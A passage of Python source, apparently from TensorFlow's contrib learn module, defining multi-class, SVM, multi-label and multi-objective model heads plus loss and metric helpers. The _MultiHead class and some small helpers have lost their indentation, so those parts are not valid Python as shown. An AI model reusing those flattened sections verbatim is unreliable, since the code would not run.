    if not labels.dtype.is_integer:
      raise ValueError("Labels dtype should be integer "
                       "Instead got %s." % labels.dtype)
    # sparse_softmax_cross_entropy_with_logits requires [batch_size] labels.
    is_squeezed_labels = False
    # TODO(ptucker): This will break for dynamic shapes.
    if len(labels.get_shape()) == 2:
      labels = array_ops.squeeze(labels, squeeze_dims=(1,))
      is_squeezed_labels = True
    loss = nn.sparse_softmax_cross_entropy_with_logits(
        labels=labels, logits=logits, name=name)
    # Restore squeezed dimension, if necessary, so loss matches weights shape.
    if is_squeezed_labels:
      loss = array_ops.expand_dims(loss, axis=(1,))
  return _compute_weighted_loss(loss, weights)
class _MultiClassHead(_SingleHead):
  """'Head' for multi class classification."""
  def __init__(self,
               n_classes,
               label_name=None,
               weight_column_name=None,
               enable_centered_bias=False,
               head_name=None,
               loss_fn=None,
               thresholds=None,
               metric_class_ids=None,
               label_keys=None):
    """'Head' for multi class classification.

    This head expects to be fed integer labels specifying the class index. But
    if `label_keys` is specified, then labels must be strings from this
    vocabulary, and the predicted classes will be strings from the same
    vocabulary.

    Args:
      n_classes: Number of classes, must be greater than 2 (for 2 classes, use
        `_BinaryLogisticHead`).
      label_name: String, name of the key in label dict. Can be null if label
        is a tensor (single headed models).
      weight_column_name: A string defining feature column name representing
        weights. It is used to down weight or boost examples during training. It
        will be multiplied by the loss of the example.
      enable_centered_bias: A bool. If True, estimator will learn a centered
        bias variable for each class. Rest of the model structure learns the
        residual after centered bias.
      head_name: name of the head. If provided, predictions, summary, metrics
        keys will be suffixed by `"/" + head_name` and the default variable
        scope will be `head_name`.
      loss_fn: Loss function. Defaults to softmax cross entropy loss.
      thresholds: thresholds for eval.
      metric_class_ids: List of class IDs for which we should report per-class
        metrics. Must all be in the range `[0, n_classes)`.
      label_keys: Optional list of strings with size `[n_classes]` defining the
        label vocabulary.

    Raises:
      ValueError: if `n_classes`, `metric_class_ids` or `label_keys` is invalid.
    """
    super(_MultiClassHead, self).__init__(
        problem_type=constants.ProblemType.CLASSIFICATION,
        logits_dimension=n_classes,
        label_name=label_name,
        weight_column_name=weight_column_name,
        head_name=head_name)
    if (n_classes is None) or (n_classes <= 2):
      raise ValueError("n_classes must be > 2: %s." % n_classes)
    self._thresholds = thresholds if thresholds else (.5,)
    self._loss_fn = loss_fn if loss_fn else _softmax_cross_entropy_loss
    self._enable_centered_bias = enable_centered_bias
    self._metric_class_ids = tuple([] if metric_class_ids is None else
                                   metric_class_ids)
    for class_id in self._metric_class_ids:
      if (class_id < 0) or (class_id >= n_classes):
        raise ValueError("Class ID %s not in [0, %s)." % (class_id, n_classes))
    if label_keys and len(label_keys) != n_classes:
      raise ValueError("Length of label_keys must equal n_classes.")
    self._label_keys = label_keys
  def create_model_fn_ops(self,
                          features,
                          mode,
                          labels=None,
                          train_op_fn=None,
                          logits=None,
                          logits_input=None,
                          scope=None):
    """See `Head`."""
    with variable_scope.variable_scope(
        scope,
        default_name=self.head_name or "multi_class_head",
        values=(tuple(six.itervalues(features)) +
                (labels, logits, logits_input))):
      labels = self._transform_labels(mode=mode, labels=labels)
      logits = _logits(logits_input, logits, self.logits_dimension)
      return _create_model_fn_ops(
          features=features,
          mode=mode,
          # Wrapped so the loss sees integer label IDs, not raw labels.
          loss_fn=self._wrapped_loss_fn,
          logits_to_predictions_fn=self._logits_to_predictions,
          metrics_fn=self._metrics,
          create_output_alternatives_fn=_classification_output_alternatives(
              self.head_name, self._problem_type, self._label_keys),
          labels=labels,
          train_op_fn=train_op_fn,
          logits=logits,
          logits_dimension=self.logits_dimension,
          head_name=self.head_name,
          weight_column_name=self.weight_column_name,
          enable_centered_bias=self._enable_centered_bias)
  def _transform_labels(self, mode, labels):
    """Returns a dict that contains both the original labels and label IDs."""
    if (mode == model_fn.ModeKeys.INFER) or (labels is None):
      return None
    labels_tensor = _to_labels_tensor(labels, self._label_name)
    _check_no_sparse_tensor(labels_tensor)
    if self._label_keys:
      # Map vocabulary strings to integer IDs for the loss.
      table = lookup_lib.string_to_index_table_from_tensor(
          mapping=self._label_keys,
          name="label_id_lookup")
      return {
          "labels": labels_tensor,
          "label_ids": table.lookup(labels_tensor),
      }
    return {
        "labels": labels_tensor,
        "label_ids": labels_tensor,
    }
  def _labels(self, labels_dict):
    """Returns labels `Tensor` of the same type as classes."""
    return labels_dict["labels"]
  def _label_ids(self, labels_dict):
    """Returns integer label ID `Tensor`."""
    return labels_dict["label_ids"]
  def _wrapped_loss_fn(self, labels, logits, weights=None):
    # Adapts the labels dict produced by `_transform_labels` to `_loss_fn`,
    # which expects integer label IDs.
    return self._loss_fn(self._label_ids(labels), logits, weights=weights)
  def _logits_to_predictions(self, logits):
    """Returns a dict of predictions.

    Args:
      logits: logits `Tensor` after applying possible centered bias.

    Returns:
      Dict of prediction `Tensor` keyed by `PredictionKey`.
    """
    with ops.name_scope(None, "predictions", (logits,)):
      class_ids = math_ops.argmax(
          logits, 1, name=prediction_key.PredictionKey.CLASSES)
      if self._label_keys:
        # Map predicted IDs back to vocabulary strings.
        table = lookup_lib.index_to_string_table_from_tensor(
            mapping=self._label_keys,
            name="class_string_lookup")
        classes = table.lookup(class_ids)
      else:
        classes = class_ids
      return {
          prediction_key.PredictionKey.LOGITS: logits,
          prediction_key.PredictionKey.PROBABILITIES:
              nn.softmax(
                  logits, name=prediction_key.PredictionKey.PROBABILITIES),
          prediction_key.PredictionKey.CLASSES: classes
      }
  def _metrics(self, eval_loss, predictions, labels, weights):
    """Returns a dict of metrics keyed by name."""
    with ops.name_scope(
        "metrics",
        values=((eval_loss, self._labels(labels), self._label_ids(labels),
                 weights) + tuple(six.itervalues(predictions)))):
      logits = predictions[prediction_key.PredictionKey.LOGITS]
      probabilities = predictions[prediction_key.PredictionKey.PROBABILITIES]
      classes = predictions[prediction_key.PredictionKey.CLASSES]
      metrics = {_summary_key(self.head_name, mkey.LOSS):
                 metrics_lib.streaming_mean(eval_loss)}
      # TODO(b/29366811): This currently results in both an "accuracy" and an
      # "accuracy/threshold_0.500000_mean" metric for binary classification.
      metrics[_summary_key(self.head_name, mkey.ACCURACY)] = (
          metrics_lib.streaming_accuracy(
              classes, self._labels(labels), weights))
      if not self._label_keys:
        # Classes are IDs. Add some metrics.
        for class_id in self._metric_class_ids:
          metrics[_summary_key(
              self.head_name, mkey.CLASS_PREDICTION_MEAN % class_id)] = (
                  _class_predictions_streaming_mean(classes, weights, class_id))
          # TODO(ptucker): Add per-class accuracy, precision, recall.
          metrics[_summary_key(
              self.head_name, mkey.CLASS_LABEL_MEAN % class_id)] = (
                  _class_labels_streaming_mean(
                      self._label_ids(labels), weights, class_id))
          metrics[_summary_key(
              self.head_name, mkey.CLASS_PROBABILITY_MEAN % class_id)] = (
                  _predictions_streaming_mean(probabilities, weights, class_id))
          metrics[_summary_key(
              self.head_name, mkey.CLASS_LOGITS_MEAN % class_id)] = (
                  _predictions_streaming_mean(logits, weights, class_id))
      return metrics
def _to_labels_tensor(labels, label_name):
  """Returns label as a tensor.

  Args:
    labels: Label `Tensor` or `SparseTensor` or a dict containing labels.
    label_name: Label name if labels is a dict.

  Returns:
    Label `Tensor` or `SparseTensor`.
  """
  labels = labels[label_name] if isinstance(labels, dict) else labels
  return framework_lib.convert_to_tensor_or_sparse_tensor(labels)
def _check_no_sparse_tensor(x):
  """Ensures the given tensor is dense.

  Args:
    x: A `Tensor` or `SparseTensor`.

  Raises:
    ValueError: If `x` is a `SparseTensor`.
  """
  is_sparse = isinstance(x, sparse_tensor.SparseTensor)
  if is_sparse:
    raise ValueError("SparseTensor is not supported.")
def _sparse_labels_to_indicator(labels, num_classes):
  """If labels is `SparseTensor`, converts it to indicator `Tensor`.

  Args:
    labels: Label `Tensor` or `SparseTensor`.
    num_classes: Number of classes.

  Returns:
    Dense label `Tensor`.

  Raises:
    ValueError: If labels is `SparseTensor` and `num_classes` < 2.
  """
  if isinstance(labels, sparse_tensor.SparseTensor):
    if num_classes < 2:
      raise ValueError("Must set num_classes >= 2 when passing labels as a "
                       "SparseTensor.")
    # Indicator output is 0/1 per class; cast to int64 for metric ops.
    return math_ops.to_int64(
        sparse_ops.sparse_to_indicator(labels, num_classes))
  return labels
def _assert_labels_rank(labels):
  """Returns an assert op checking labels have rank <= 2."""
  return control_flow_ops.Assert(
      math_ops.less_equal(array_ops.rank(labels), 2),
      ("labels shape should be either [batch_size, 1] or [batch_size]",))
class _BinarySvmHead(_SingleHead):
  """`Head` for binary classification using SVM."""
  def __init__(self, label_name, weight_column_name, enable_centered_bias,
               head_name, thresholds):
    """See `_BinaryLogisticHead.__init__` for argument semantics."""
    # Hinge loss; labels are reshaped to [batch_size, 1] to match logits.
    def _loss_fn(labels, logits, weights=None):
      with ops.name_scope(None, "hinge_loss", (logits, labels)) as name:
        with ops.control_dependencies((_assert_labels_rank(labels),)):
          labels = array_ops.reshape(labels, shape=(-1, 1))
        loss = losses_lib.hinge_loss(logits=logits, labels=labels, scope=name)
      return _compute_weighted_loss(loss, weights)
    super(_BinarySvmHead, self).__init__(
        problem_type=constants.ProblemType.LOGISTIC_REGRESSION,
        logits_dimension=1,
        label_name=label_name,
        weight_column_name=weight_column_name,
        head_name=head_name)
    self._thresholds = thresholds if thresholds else (.5,)
    self._loss_fn = _loss_fn
    self._enable_centered_bias = enable_centered_bias
  def create_model_fn_ops(self,
                          features,
                          mode,
                          labels=None,
                          train_op_fn=None,
                          logits=None,
                          logits_input=None,
                          scope=None):
    """See `Head`."""
    with variable_scope.variable_scope(
        scope,
        default_name=self.head_name or "binary_svm_head",
        values=(tuple(six.itervalues(features)) +
                (labels, logits, logits_input))):
      labels = self._transform_labels(mode=mode, labels=labels)
      logits = _logits(logits_input, logits, self.logits_dimension)
      return _create_model_fn_ops(
          features=features,
          mode=mode,
          loss_fn=self._loss_fn,
          logits_to_predictions_fn=self._logits_to_predictions,
          metrics_fn=self._metrics,
          # TODO(zakaria): Handle labels for export.
          create_output_alternatives_fn=self._create_output_alternatives,
          labels=labels,
          train_op_fn=train_op_fn,
          logits=logits,
          logits_dimension=self.logits_dimension,
          head_name=self.head_name,
          weight_column_name=self.weight_column_name,
          enable_centered_bias=self._enable_centered_bias)
  def _transform_labels(self, mode, labels):
    """Applies transformations to labels tensor."""
    # No labels in INFER mode; SVM labels must be dense.
    if (mode == model_fn.ModeKeys.INFER) or (labels is None):
      return None
    labels_tensor = _to_labels_tensor(labels, self._label_name)
    _check_no_sparse_tensor(labels_tensor)
    return labels_tensor
  def _logits_to_predictions(self, logits):
    """See `_MultiClassHead`."""
    with ops.name_scope(None, "predictions", (logits,)):
      return {
          prediction_key.PredictionKey.LOGITS:
              logits,
          prediction_key.PredictionKey.CLASSES:
              math_ops.argmax(
                  _one_class_to_two_class_logits(logits),
                  1,
                  name=prediction_key.PredictionKey.CLASSES)
      }
  def _metrics(self, eval_loss, predictions, labels, weights):
    """See `_MultiClassHead`."""
    with ops.name_scope("metrics", values=(
        [eval_loss, labels, weights] + list(six.itervalues(predictions)))):
      metrics = {_summary_key(self.head_name, mkey.LOSS):
                 metrics_lib.streaming_mean(eval_loss)}
      # TODO(b/29366811): This currently results in both an "accuracy" and an
      # "accuracy/threshold_0.500000_mean" metric for binary classification.
      classes = predictions[prediction_key.PredictionKey.CLASSES]
      metrics[_summary_key(self.head_name, mkey.ACCURACY)] = (
          metrics_lib.streaming_accuracy(classes, labels, weights))
      # TODO(sibyl-vie3Poto): add more metrics relevant for svms.
      return metrics
class _MultiLabelHead(_SingleHead):
  """`Head` for multi-label classification."""
  # TODO(zakaria): add signature and metric for multilabel.
  def __init__(self,
               n_classes,
               label_name,
               weight_column_name,
               enable_centered_bias,
               head_name,
               thresholds,
               metric_class_ids=None,
               loss_fn=None):
    """See `_MultiClassHead.__init__` for argument semantics.

    Unlike `_MultiClassHead`, each example may belong to multiple classes;
    labels may be given as an indicator `Tensor` or a `SparseTensor` of
    class IDs, and the loss defaults to per-class sigmoid cross entropy.
    """
    super(_MultiLabelHead, self).__init__(
        problem_type=constants.ProblemType.CLASSIFICATION,
        logits_dimension=n_classes,
        label_name=label_name,
        weight_column_name=weight_column_name,
        head_name=head_name)
    self._thresholds = thresholds if thresholds else (.5,)
    self._loss_fn = loss_fn if loss_fn else _sigmoid_cross_entropy_loss
    self._enable_centered_bias = enable_centered_bias
    self._metric_class_ids = tuple([] if metric_class_ids is None else
                                   metric_class_ids)
    for class_id in self._metric_class_ids:
      if (class_id < 0) or (class_id >= n_classes):
        raise ValueError("Class ID %s not in [0, %s)." % (class_id, n_classes))
  def create_model_fn_ops(self,
                          features,
                          mode,
                          labels=None,
                          train_op_fn=None,
                          logits=None,
                          logits_input=None,
                          scope=None):
    """See `Head`."""
    with variable_scope.variable_scope(
        scope,
        default_name=self.head_name or "multi_label_head",
        values=(tuple(six.itervalues(features)) +
                (labels, logits, logits_input))):
      labels = self._transform_labels(mode=mode, labels=labels)
      logits = _logits(logits_input, logits, self.logits_dimension)
      return _create_model_fn_ops(
          features=features,
          mode=mode,
          loss_fn=self._loss_fn,
          logits_to_predictions_fn=self._logits_to_predictions,
          metrics_fn=self._metrics,
          create_output_alternatives_fn=_classification_output_alternatives(
              self.head_name, self._problem_type),
          labels=labels,
          train_op_fn=train_op_fn,
          logits=logits,
          logits_dimension=self.logits_dimension,
          head_name=self.head_name,
          weight_column_name=self.weight_column_name,
          enable_centered_bias=self._enable_centered_bias)
  def _transform_labels(self, mode, labels):
    """Applies transformations to labels tensor."""
    if (mode == model_fn.ModeKeys.INFER) or (labels is None):
      return None
    labels_tensor = _to_labels_tensor(labels, self._label_name)
    # Sparse class-ID labels are converted to a dense indicator matrix.
    labels_tensor = _sparse_labels_to_indicator(labels_tensor,
                                                self._logits_dimension)
    return labels_tensor
  def _logits_to_predictions(self, logits):
    """See `_MultiClassHead`."""
    with ops.name_scope(None, "predictions", (logits,)):
      return {
          prediction_key.PredictionKey.LOGITS:
              logits,
          prediction_key.PredictionKey.PROBABILITIES:
              math_ops.sigmoid(
                  logits, name=prediction_key.PredictionKey.PROBABILITIES),
          prediction_key.PredictionKey.CLASSES:
              # Per-class decision: positive logit means class is predicted.
              math_ops.to_int64(
                  math_ops.greater(logits, 0),
                  name=prediction_key.PredictionKey.CLASSES)
      }
  def _metrics(self, eval_loss, predictions, labels, weights):
    """Returns a dict of metrics keyed by name."""
    with ops.name_scope("metrics", values=(
        [eval_loss, labels, weights] + list(six.itervalues(predictions)))):
      classes = predictions[prediction_key.PredictionKey.CLASSES]
      probabilities = predictions[prediction_key.PredictionKey.PROBABILITIES]
      logits = predictions[prediction_key.PredictionKey.LOGITS]
      metrics = {_summary_key(self.head_name, mkey.LOSS):
                 metrics_lib.streaming_mean(eval_loss)}
      # TODO(b/29366811): This currently results in both an "accuracy" and an
      # "accuracy/threshold_0.500000_mean" metric for binary classification.
      metrics[_summary_key(self.head_name, mkey.ACCURACY)] = (
          metrics_lib.streaming_accuracy(classes, labels, weights))
      metrics[_summary_key(self.head_name, mkey.AUC)] = _streaming_auc(
          probabilities, labels, weights)
      metrics[_summary_key(self.head_name, mkey.AUC_PR)] = _streaming_auc(
          probabilities, labels, weights, curve="PR")
      for class_id in self._metric_class_ids:
        # TODO(ptucker): Add per-class accuracy, precision, recall.
        metrics[_summary_key(
            self.head_name, mkey.CLASS_PREDICTION_MEAN % class_id)] = (
                _predictions_streaming_mean(classes, weights, class_id))
        metrics[_summary_key(
            self.head_name, mkey.CLASS_LABEL_MEAN % class_id)] = (
                _indicator_labels_streaming_mean(labels, weights, class_id))
        metrics[_summary_key(
            self.head_name, mkey.CLASS_PROBABILITY_MEAN % class_id)] = (
                _predictions_streaming_mean(probabilities, weights, class_id))
        metrics[_summary_key(
            self.head_name, mkey.CLASS_LOGITS_MEAN % class_id)] = (
                _predictions_streaming_mean(logits, weights, class_id))
        metrics[_summary_key(self.head_name, mkey.CLASS_AUC % class_id)] = (
            _streaming_auc(probabilities, labels, weights, class_id))
        metrics[_summary_key(self.head_name, mkey.CLASS_AUC_PR % class_id)] = (
            _streaming_auc(probabilities, labels, weights, class_id,
                           curve="PR"))
      return metrics
class _MultiHead(Head):
"""`Head` implementation for multi objective learning.
This class is responsible for using and merging the output of multiple
`Head` objects.
All heads stem from the same logits/logit_input tensor.
Common usage:
For simple use cases you can pass the activation of hidden layer like
this from your model_fn,
```python
last_hidden_layer_activation = ... Build your model.
multi_head = ...
return multi_head.create_model_fn_ops(
..., logits_input=last_hidden_layer_activation, ...)
```
Or you can create a logits tensor of
[batch_size, multi_head.logits_dimension] shape. _MultiHead will split the
logits for you.
return multi_head.create_model_fn_ops(..., logits=logits, ...)
For more complex use cases like a multi-task/multi-tower model or when logits
for each head has to be created separately, you can pass a dict of logits
where the keys match the name of the single heads.
```python
logits = {"head1": logits1, "head2": logits2}
return multi_head.create_model_fn_ops(..., logits=logits, ...)
```
Here is what this class does,
+ For training, merges losses of each heads according a function provided by
user, calls user provided train_op_fn with this final loss.
+ For eval, merges metrics by adding head_name suffix to the keys in eval
metrics.
+ For inference, updates keys in prediction dict to a 2-tuple,
(head_name, prediction_key)
"""
def __init__(self, heads, loss_merger):
"""_Head to merges multiple _Head objects.
Args:
heads: list of _Head objects.
loss_merger: function that takes a list of loss tensors for the heads
and returns the final loss tensor for the multi head.
Raises:
ValueError: if any head does not have a name.
"""
self._logits_dimension = 0
for head in heads:
if not head.head_name:
raise ValueError("Members of MultiHead must have names.")
self._logits_dimension += head.logits_dimension
self._heads = heads
self._loss_merger = loss_merger
@property
def logits_dimension(self):
return self._logits_dimension
def create_model_fn_ops(self,
features,
mode,
labels=None,
train_op_fn=None,
logits=None,
logits_input=None,
scope=None):
"""See `_Head.create_model_fn_ops`.
Args:
features: Input `dict` of `Tensor` objects.
mode: Estimator's `ModeKeys`.
labels: Labels `Tensor`, or `dict` of same.
train_op_fn: Function that takes a scalar loss and returns an op to
optimize with the loss.
logits: Concatenated logits for all heads or a dict of head name to logits
tensor. If concatenated logits, it should have (batchsize, x) shape
where x is the sum of `logits_dimension` of all the heads,
i.e., same as `logits_dimension` of this class. create_model_fn_ops
will split the logits tensor and pass logits of proper size to each
head. This is useful if we want to be agnostic about whether you
creating a single versus multihead. logits can also be a dict for
convenience where you are creating the head specific logits explicitly
and don't want to concatenate them yourself.
logits_input: tensor to build logits from.
scope: Optional scope for variable_scope. If provided, will be passed to
all heads. Most users will want to set this to `None`, so each head
constructs a separate variable_scope according to its `head_name`.
Returns:
`ModelFnOps`.
Raises:
ValueError: if `mode` is not recognized, or neither or both of `logits`
and `logits_input` is provided.
"""
_check_mode_valid(mode)
all_model_fn_ops = []
if logits is None:
# Use logits_input.
for head in self._heads:
all_model_fn_ops.append(
head.create_model_fn_ops(
features=features,
mode=mode,
labels=labels,
train_op_fn=no_op_train_fn,
logits_input=logits_input,
scope=scope))
else:
head_logits_pairs = []
if isinstance(logits, dict):
head_logits_pairs = []
for head in self._heads:
head_logits_pairs.append((head, logits[head.head_name]))
else:
# Split logits for each head.
head_logits_pairs = zip(self._heads, self._split_logits(logits))
for head, head_logits in head_logits_pairs:
all_model_fn_ops.append(
head.create_model_fn_ops(
features=features,
mode=mode,
labels=labels,
train_op_fn=no_op_train_fn,
logits=head_logits,
scope=scope))
if mode == model_fn.ModeKeys.TRAIN:
if train_op_fn is None:
raise ValueError("train_op_fn can not be None in TRAIN mode.")
return self._merge_train(all_model_fn_ops, train_op_fn)
if mode == model_fn.ModeKeys.INFER:
return self._merge_infer(all_model_fn_ops)
if mode == model_fn.ModeKeys.EVAL:
return self._merge_eval(all_model_fn_ops)
raise ValueError("mode=%s unrecognized" % str(mode))
def _split_logits(self, logits):
"""Splits logits for heads.
Args:
logits: the logits tensor.
Returns:
A list of logits for the individual heads.
"""
all_logits = []
begin = 0
for head in self._heads:
current_logits_size = head.logits_dimension
current_logits = array_ops.slice(logits, [0, begin],
[-1, current_logits_size])
all_logits.append(current_logits)
begin += current_logits_size
return all_logits
def _merge_train(self, all_model_fn_ops, train_op_fn):
"""Merges list of ModelFnOps for training.
Args:
all_model_fn_ops: list of ModelFnOps for the individual heads.
train_op_fn: Function to create train op. See `create_model_fn_ops`
documentaion for more details.
Returns:
ModelFnOps that merges all heads for TRAIN.
"""
losses = []
additional_train_ops = []
for m in all_model_fn_ops:
losses.append(m.loss)
additional_train_ops.append(m.train_op)
loss = self._loss_merger(losses)
train_op = train_op_fn(loss)
train_op = control_flow_ops.group(train_op, *additional_train_ops)
return model_fn.ModelFnOps(
mode=model_fn.ModeKeys.TRAIN,
loss=loss,
train_op=train_op)
def _merge_infer(self, all_model_fn_ops):
"""Merges list of ModelFnOps for inference.
Args:
all_model_fn_ops: list of ModelFnOps for the individual heads.
Returns:
ModelFnOps that Merges all the heads for INFER.
"""
predictions = {}
output_alternatives = {}
for head, m in zip(self._heads, all_model_fn_ops):
head_name = head.head_name
output_alternatives[head_name] = m.output_alternatives[head_name]
for k, v in m.predictions.items():
predictions[(head_name, k)] = v
return model_fn.ModelFnOps(
mode=model_fn.ModeKeys.INFER,
predictions=predictions,
output_alternatives=output_alternatives)
  def _merge_eval(self, all_model_fn_ops):
    """Merges list of ModelFnOps for eval.

    Args:
      all_model_fn_ops: list of ModelFnOps for the individual heads.

    Returns:
      ModelFnOps that merges all the heads for EVAL.
    """
    predictions = {}
    metrics = {}
    losses = []
    for head, m in zip(self._heads, all_model_fn_ops):
      losses.append(m.loss)
      head_name = head.head_name
      for k, v in m.predictions.items():
        # Predictions are namespaced per head to avoid key collisions.
        predictions[(head_name, k)] = v
      for k, v in m.eval_metric_ops.items():
        # NOTE(review): metric keys are NOT namespaced by head, so identical
        # metric names from different heads overwrite each other; the
        # commented-out line suggests namespacing was considered.
        # metrics["%s/%s" % (k, head_name)] = v
        metrics[k] = v
    loss = self._loss_merger(losses)
    return model_fn.ModelFnOps(
        mode=model_fn.ModeKeys.EVAL,
        predictions=predictions,
        loss=loss,
        eval_metric_ops=metrics)
def _weight_tensor(features, weight_column_name):
  """Returns weights as 1d `Tensor`, or None when no weight column is set."""
  if weight_column_name:
    with ops.name_scope(None, "weight_tensor",
                        tuple(six.itervalues(features))):
      return math_ops.to_float(features[weight_column_name])
  return None
# TODO(zakaria): This function is needed for backward compatibility and should
# be removed when we migrate to core.
def _compute_weighted_loss(loss_unweighted, weight, name="loss"):
  """Returns a tuple of (loss_train, loss_report).

  loss is used for gradient descent while weighted_average_loss is used for
  summaries to be backward compatible.

  loss is different from the loss reported on the tensorboard as we
  should respect the example weights when computing the gradient.

    L = sum_{i} w_{i} * l_{i} / B

  where B is the number of examples in the batch, l_{i}, w_{i} are individual
  losses, and example weight.

  Args:
    loss_unweighted: Unweighted loss
    weight: Weight tensor
    name: Optional name

  Returns:
    A tuple of losses. First one for training and the second one for reporting.
  """
  with ops.name_scope(name, values=(loss_unweighted, weight)) as name_scope:
    if weight is None:
      # No weights: the same mean loss serves both training and reporting.
      loss = math_ops.reduce_mean(loss_unweighted, name=name_scope)
      return loss, loss
    weight = weights_broadcast_ops.broadcast_weights(weight, loss_unweighted)
    with ops.name_scope(None, "weighted_loss",
                        (loss_unweighted, weight)) as name:
      # `name` is rebound to the inner scope here and used only for the
      # element-wise multiply op.
      weighted_loss = math_ops.multiply(loss_unweighted, weight, name=name)
    # Training loss: mean over the batch (weights scale individual losses).
    weighted_loss_mean = math_ops.reduce_mean(weighted_loss, name=name_scope)
    # Reporting loss: weighted average (normalized by the sum of weights).
    weighted_loss_normalized = math_ops.div(
        math_ops.reduce_sum(weighted_loss),
        math_ops.to_float(math_ops.reduce_sum(weight)),
        name="weighted_average_loss")
    return weighted_loss_mean, weighted_loss_normalized
def _wrap_custom_loss_fn(loss_fn):
def _wrapper(labels, logits, weights=None):
if weights is None:
loss = loss_fn(labels, logits)
else:
loss = loss_fn(labels, logits, weights)
return loss, loss
return _wrapper
def _check_mode_valid(mode):
  """Raises ValueError if the given mode is invalid."""
  valid_modes = (model_fn.ModeKeys.TRAIN, model_fn.ModeKeys.INFER,
                 model_fn.ModeKeys.EVAL)
  if mode not in valid_modes:
    raise ValueError("mode=%s unrecognized." % str(mode))
def _get_arguments(func):
  """Returns a spec of given func."""
  # Strip TensorFlow decorators so the underlying callable is inspected.
  _, func = tf_decorator.unwrap(func)
  if hasattr(func, "__code__"):
    # Regular function.
    return tf_inspect.getargspec(func)
  elif hasattr(func, "__call__"):
    # Callable object.
    return _get_arguments(func.__call__)
  elif hasattr(func, "func"):
    # Partial function.
    # NOTE(review): functools.partial objects also expose __call__, so they
    # may be caught by the branch above before reaching here -- TODO confirm.
    return _get_arguments(func.func)
  # NOTE(review): falls through and implicitly returns None when no branch
  # matches; callers accessing `.args` would then fail with AttributeError.
def _verify_loss_fn_args(loss_fn):
  """Checks that `loss_fn` accepts `labels`, `logits` and `weights` args."""
  actual_args = _get_arguments(loss_fn).args
  for required in ("labels", "logits", "weights"):
    if required not in actual_args:
      raise ValueError("Argument %s not found in loss_fn." % required)
def _centered_bias(logits_dimension, head_name=None):
  """Returns centered_bias `Variable`.

  Args:
    logits_dimension: Last dimension of `logits`. Must be >= 1.
    head_name: Optional name of the head.

  Returns:
    `Variable` with shape `[logits_dimension]`.

  Raises:
    ValueError: if `logits_dimension` is invalid.
  """
  if (logits_dimension is None) or (logits_dimension < 1):
    raise ValueError("Invalid logits_dimension %s." % logits_dimension)
  # Do not create a variable with variable_scope.get_variable, because that may
  # create a PartitionedVariable, which does not support indexing, so
  # summary.scalar will not work.
  centered_bias = variable_scope.variable(
      name="centered_bias_weight",
      initial_value=array_ops.zeros(shape=(logits_dimension,)),
      trainable=True)
  # One scalar summary per output dimension, namespaced by head when given.
  for dim in range(logits_dimension):
    tag = "centered_bias/bias_%d" % dim
    if head_name:
      tag = "%s/%s" % (tag, head_name)
    summary.scalar(tag, centered_bias[dim])
  return centered_bias
def _centered_bias_step(centered_bias, batch_size, labels, loss_fn, weights):
  """Creates and returns training op for centered bias."""
  with ops.name_scope(None, "centered_bias_step", (labels,)) as name:
    logits_dimension = array_ops.shape(centered_bias)[0]
    # Broadcast the bias vector to [batch_size, logits_dimension] so it can
    # be fed to `loss_fn` as if it were per-example logits.
    logits = array_ops.reshape(
        array_ops.tile(centered_bias, (batch_size,)),
        (batch_size, logits_dimension))
    with ops.name_scope(None, "centered_bias", (labels, logits)):
      centered_bias_loss = math_ops.reduce_mean(
          loss_fn(labels, logits, weights), name="training_loss")
  # Learn central bias by an optimizer. 0.1 is a conservative lr for a
  # single variable.
  return training.AdagradOptimizer(0.1).minimize(
      centered_bias_loss, var_list=(centered_bias,), name=name)
def _summary_key(head_name, val):
return "%s/%s" % (val, head_name) if head_name else val
def _train_op(loss, labels, train_op_fn, centered_bias, batch_size, loss_fn,
              weights):
  """Returns op for the training step."""
  # The optional centered-bias update runs alongside the main train op.
  centered_bias_step = None
  if centered_bias is not None:
    centered_bias_step = _centered_bias_step(
        centered_bias=centered_bias,
        batch_size=batch_size,
        labels=labels,
        loss_fn=loss_fn,
        weights=weights)
  with ops.name_scope(None, "train_op", (loss, labels)):
    train_op = train_op_fn(loss)
    if centered_bias_step is not None:
      train_op = control_flow_ops.group(train_op, centered_bias_step)
    return train_op
def _sigmoid_cross_entropy_loss(labels, logits, weights=None):
  """Sigmoid cross-entropy, reduced through `_compute_weighted_loss`."""
  with ops.name_scope(None, "sigmoid_cross_entropy_loss",
                      (logits, labels)) as name:
    # sigmoid_cross_entropy_with_logits requires [batch_size, n_classes] labels.
    unweighted_loss = nn.sigmoid_cross_entropy_with_logits(
        labels=math_ops.to_float(labels), logits=logits, name=name)
    return _compute_weighted_loss(unweighted_loss, weights)
def _float_weights_or_none(weights):
  """Returns `weights` cast to float, or None when no weights were given."""
  if weights is not None:
    with ops.name_scope(None, "float_weights", (weights,)) as name:
      return math_ops.to_float(weights, name=name)
  return None
def _indicator_labels_streaming_mean(labels, weights=None, class_id=None):
  """Streaming mean of indicator `labels`, optionally for one class column."""
  float_labels = math_ops.to_float(labels)
  float_weights = _float_weights_or_none(weights)
  if float_weights is not None:
    float_weights = weights_broadcast_ops.broadcast_weights(
        float_weights, float_labels)
  if class_id is not None:
    # Restrict both labels and weights to the requested class column.
    if float_weights is not None:
      float_weights = float_weights[:, class_id]
    float_labels = float_labels[:, class_id]
  return metrics_lib.streaming_mean(float_labels, weights=float_weights)
def _predictions_streaming_mean(predictions,
                                weights=None,
                                class_id=None):
  """Streaming mean of `predictions`, optionally for one class column."""
  float_predictions = math_ops.to_float(predictions)
  float_weights = _float_weights_or_none(weights)
  if float_weights is not None:
    float_weights = weights_broadcast_ops.broadcast_weights(
        float_weights, float_predictions)
  if class_id is not None:
    # Restrict both predictions and weights to the requested class column.
    if float_weights is not None:
      float_weights = float_weights[:, class_id]
    float_predictions = float_predictions[:, class_id]
  return metrics_lib.streaming_mean(float_predictions, weights=float_weights)
# TODO(ptucker): Add support for SparseTensor labels.
def _class_id_labels_to_indicator(labels, num_classes):
  """Converts dense class-id `labels` to a one-hot indicator tensor."""
  if (num_classes is None) or (num_classes < 2):
    raise ValueError("Invalid num_classes %s." % num_classes)
  with ops.control_dependencies((_assert_labels_rank(labels),)):
    # Flatten to a vector; the rank is checked by _assert_labels_rank above.
    labels = array_ops.reshape(labels, (-1,))
  return array_ops.one_hot(labels, depth=num_classes, axis=-1)
def _class_predictions_streaming_mean(predictions, weights, class_id):
  """Streaming mean of the indicator {prediction == class_id}."""
  matches_class = math_ops.equal(
      math_ops.to_int32(class_id), math_ops.to_int32(predictions))
  indicator = array_ops.where(
      matches_class,
      array_ops.ones_like(predictions),
      array_ops.zeros_like(predictions))
  return metrics_lib.streaming_mean(indicator, weights=weights)
def _class_labels_streaming_mean(labels, weights, class_id):
